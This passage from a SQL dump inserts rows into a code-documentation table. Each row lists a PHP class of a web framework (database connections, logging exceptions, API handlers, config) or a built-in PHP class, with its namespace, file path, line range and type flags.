`file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ResultMysqli', 'ResultMysqli', 'SYSTEM\\DB', NULL, 0, 5, 37, '/home/web/webdir/system/db/result/ResultMysqli.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ResultPostgres', 'ResultPostgres', 'SYSTEM\\DB', NULL, 0, 5, 37, '/home/web/webdir/system/db/result/ResultPostgres.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ResultAMQP', 'ResultAMQP', 'SYSTEM\\DB', NULL, 0, 5, 37, '/home/web/webdir/system/db/result/ResultAMQP.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\Result', 'Result', 'SYSTEM\\DB', NULL, 0, 5, 16, '/home/web/webdir/system/db/result/Result.php', 1, 0, 0, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ConnectionPG', 'ConnectionPG', 'SYSTEM\\DB', NULL, 0, 5, 61, '/home/web/webdir/system/db/connection/ConnectionPG.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ConnectionAMQP', 'ConnectionAMQP', 'SYSTEM\\DB', NULL, 0, 5, 64, '/home/web/webdir/system/db/connection/ConnectionAMQP.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ConnectionMYS', 'ConnectionMYS', 'SYSTEM\\DB', NULL, 0, 5, 57, '/home/web/webdir/system/db/connection/ConnectionMYS.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\DBInfoPG', 'DBInfoPG', 'SYSTEM\\DB', NULL, 0, 4, 19, '/home/web/webdir/system/db/dbinfo/DBInfoPG.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\ConnectionAbstr', 'ConnectionAbstr', 'SYSTEM\\DB', NULL, 0, 5, 28, '/home/web/webdir/system/db/connection/ConnectionAbstr.php', 1, 0, 0, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\Connection', 'Connection', 'SYSTEM\\DB', NULL, 0, 5, 40, '/home/web/webdir/system/db/connection/Connection.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\DBInfoAMQP', 'DBInfoAMQP', 'SYSTEM\\DB', NULL, 0, 4, 19, '/home/web/webdir/system/db/dbinfo/DBInfoAMQP.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\DBInfoMYS', 'DBInfoMYS', 'SYSTEM\\DB', NULL, 0, 4, 19, '/home/web/webdir/system/db/dbinfo/DBInfoMYS.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DB\\DBInfo', 'DBInfo', 'SYSTEM\\DB', NULL, 0, 5, 13, '/home/web/webdir/system/db/dbinfo/DBInfo.php', 1, 0, 0, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DBD\\system_user', 'system_user', 'SYSTEM\\DBD', NULL, 0, 5, 19, '/home/web/webdir/system/dbd/tbl/system_user.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DBD\\locale_string', 'locale_string', 'SYSTEM\\DBD', NULL, 0, 5, 23, '/home/web/webdir/system/dbd/tbl/locale_string.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DBD\\system_api', 'system_api', 'SYSTEM\\DBD', NULL, 0, 5, 22, '/home/web/webdir/system/dbd/tbl/system_api.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DBD\\system_log', 'system_log', 'SYSTEM\\DBD', NULL, 0, 4, 26, '/home/web/webdir/system/dbd/tbl/system_log.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DBD\\UserRightsTable', 'UserRightsTable', 'SYSTEM\\DBD', NULL, 0, 5, 12, '/home/web/webdir/system/dbd/tbl/UserRightsTable.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DBD\\UserLoginsTable', 'UserLoginsTable', 'SYSTEM\\DBD', NULL, 0, 5, 14, '/home/web/webdir/system/dbd/tbl/UserLoginsTable.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\PAGE\\Page', 'Page', 'SYSTEM\\PAGE', NULL, 0, 5, 7, '/home/web/webdir/system/page/Page.php', 1, 0, 0, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\PAGE\\replace', 'replace', 'SYSTEM\\PAGE', NULL, 0, 5, 32, '/home/web/webdir/system/page/replace.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\API\\api_default', 'api_default', 'SYSTEM\\API', NULL, 0, 5, 8, '/home/web/webdir/system/api/api_default.php', 1, 0, 0, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\API\\api_login', 'api_login', 'SYSTEM\\API', NULL, 0, 5, 30, '/home/web/webdir/system/api/api_login.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\API\\api_system', 'api_system', 'SYSTEM\\API', NULL, 0, 5, 41, '/home/web/webdir/system/api/api_system.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\API\\verify', 'verify', 'SYSTEM\\API', NULL, 0, 5, 17, '/home/web/webdir/system/api/verify.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\API\\api', 'api', 'SYSTEM\\API', NULL, 0, 4, 152, '/home/web/webdir/system/api/Api.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\WARNING', 'WARNING', 'SYSTEM\\LOG', NULL, 0, 4, 4, '/home/web/webdir/system/log/exceptions/WARNING.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\ERROR_EXCEPTION', 'ERROR_EXCEPTION', 'SYSTEM\\LOG', NULL, 0, 4, 4, '/home/web/webdir/system/log/exceptions/ERROR_EXCEPTION.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\ERROR', 'ERROR', 'SYSTEM\\LOG', NULL, 0, 4, 4, '/home/web/webdir/system/log/exceptions/ERROR.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\TranslatableError', 'TranslatableError', 'SYSTEM\\LOG', NULL, 0, 4, 13, '/home/web/webdir/system/log/exceptions/TranslatableError.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\INFO', 'INFO', 'SYSTEM\\LOG', NULL, 0, 4, 4, '/home/web/webdir/system/log/exceptions/INFO.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\COUNTER', 'COUNTER', 'SYSTEM\\LOG', NULL, 0, 4, 4, '/home/web/webdir/system/log/exceptions/COUNTER.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\SHUTDOWN_EXCEPTION', 'SHUTDOWN_EXCEPTION', 'SYSTEM\\LOG', NULL, 0, 4, 4, '/home/web/webdir/system/log/exceptions/SHUTDOWN_EXCEPTION.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\SYSTEM_ERROR_EXCEPTION', 'SYSTEM_ERROR_EXCEPTION', 'SYSTEM\\LOG', NULL, 0, 4, 10, '/home/web/webdir/system/log/exceptions/SYSTEM_ERROR_EXCEPTION.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\DEPRECATED', 'DEPRECATED', 'SYSTEM\\LOG', NULL, 0, 4, 4, '/home/web/webdir/system/log/exceptions/DEPRECATED.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\JsonResult', 'JsonResult', 'SYSTEM\\LOG', NULL, 0, 5, 50, '/home/web/webdir/system/log/result/JsonResult.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\SYSTEM_EXCEPTION', 'SYSTEM_EXCEPTION', 'SYSTEM\\LOG', NULL, 0, 4, 10, '/home/web/webdir/system/log/exceptions/SYSTEM_EXCEPTION.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\AbstractResult', 'AbstractResult', 'SYSTEM\\LOG', NULL, 0, 5, 15, '/home/web/webdir/system/log/result/AbstractResult.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\HEADER', 'HEADER', 'SYSTEM', NULL, 0, 4, 21, '/home/web/webdir/system/system/HEADER.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\locale', 'locale', 'SYSTEM', NULL, 0, 4, 81, '/home/web/webdir/system/system/locale.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DOCU\\code_docu', 'code_docu', 'SYSTEM\\DOCU', NULL, 0, 4, 62, '/home/web/webdir/system/docu/code_docu.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\time', 'time', 'SYSTEM', NULL, 0, 5, 13, '/home/web/webdir/system/system/time.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\IMG\\img', 'img', 'SYSTEM\\IMG', NULL, 0, 5, 69, '/home/web/webdir/system/img/img.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\CONFIG\\config', 'config', 'SYSTEM\\CONFIG', NULL, 0, 5, 28, '/home/web/webdir/system/config/config.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\CONFIG\\config_ids', 'config_ids', 'SYSTEM\\CONFIG', NULL, 0, 5, 31, '/home/web/webdir/system/config/config_ids.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('docu_categories', 'docu_categories', '', NULL, 0, 2, 7, '/home/web/webdir/mojotrollz/mojotrollz/docu/docu_categories.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\error_handler_jsonoutput', 'error_handler_jsonoutput', 'SYSTEM\\LOG', NULL, 0, 5, 15, '/home/web/webdir/system/log/error_handler/error_handler_jsonoutput.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\error_handler', 'error_handler', 'SYSTEM\\LOG', NULL, 0, 5, 12, '/home/web/webdir/system/log/error_handler/error_handler.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\error_handler_dbwriter', 'error_handler_dbwriter', 'SYSTEM\\LOG', NULL, 0, 7, 56, '/home/web/webdir/system/log/error_handler/error_handler_dbwriter.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\system', 'system', 'SYSTEM', NULL, 0, 5, 49, '/home/web/webdir/system/system/system.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\LOG\\log', 'log', 'SYSTEM\\LOG', NULL, 0, 7, 51, '/home/web/webdir/system/log/log.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\PROOT', 'PROOT', 'SYSTEM', NULL, 0, 12, 15, '/home/web/webdir/system/system/path.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\PSYSTEM', 'PSYSTEM', 'SYSTEM', NULL, 0, 17, 20, '/home/web/webdir/system/system/path.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\PSAI', 'PSAI', 'SYSTEM', NULL, 0, 22, 25, '/home/web/webdir/system/system/path.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\autoload', 'autoload', 'SYSTEM', NULL, 0, 5, 94, '/home/web/webdir/system/system/autoload.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DOCU\\docu', 'docu', 'SYSTEM\\DOCU', NULL, 0, 4, 25, '/home/web/webdir/system/docu/docu.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\DOCU\\docu_categories', 'docu_categories', 'SYSTEM\\DOCU', NULL, 0, 4, 6, '/home/web/webdir/system/docu/docu_categories.php', 0, 0, 1, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('mysqli_stmt', 'mysqli_stmt', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PDOException', 'PDOException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PDO', 'PDO', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PDOStatement', 'PDOStatement', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PDORow', 'PDORow', '', NULL, 0, 0, 0, '', 0, 1, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SYSTEM\\PATH', 'PATH', 'SYSTEM', NULL, 0, 7, 10, '/home/web/webdir/system/system/path.php', 1, 0, 0, 0, 0, 0, 1); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('mysqli_result', 'mysqli_result', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('mysqli_warning', 'mysqli_warning', '', NULL, 0, 0, 0, '', 0, 1, 0, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('mysqli', 'mysqli', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('mysqli_driver', 'mysqli_driver', '', NULL, 0, 0, 0, '', 0, 1, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('mysqli_sql_exception', 'mysqli_sql_exception', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('ZipArchive', 'ZipArchive', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('XMLWriter', 'XMLWriter', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('XMLReader', 'XMLReader', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PharFileInfo', 'PharFileInfo', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PharData', 'PharData', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('Phar', 'Phar', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 1, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('PharException', 'PharException', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SoapHeader', 'SoapHeader', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SoapParam', 'SoapParam', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SoapFault', 'SoapFault', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, `namespace`, `text`, `dead`, `line_start`, `line_end`, `file`, `abstract`, `final`, `instantiable`, `interface`, `internal`, `iterateable`, `userdefined`) VALUES ('SoapServer', 'SoapServer', '', NULL, 0, 0, 0, '', 0, 0, 1, 0, 1, 0, 0); INSERT INTO `system_code_docu_class` (`class`, `name`, 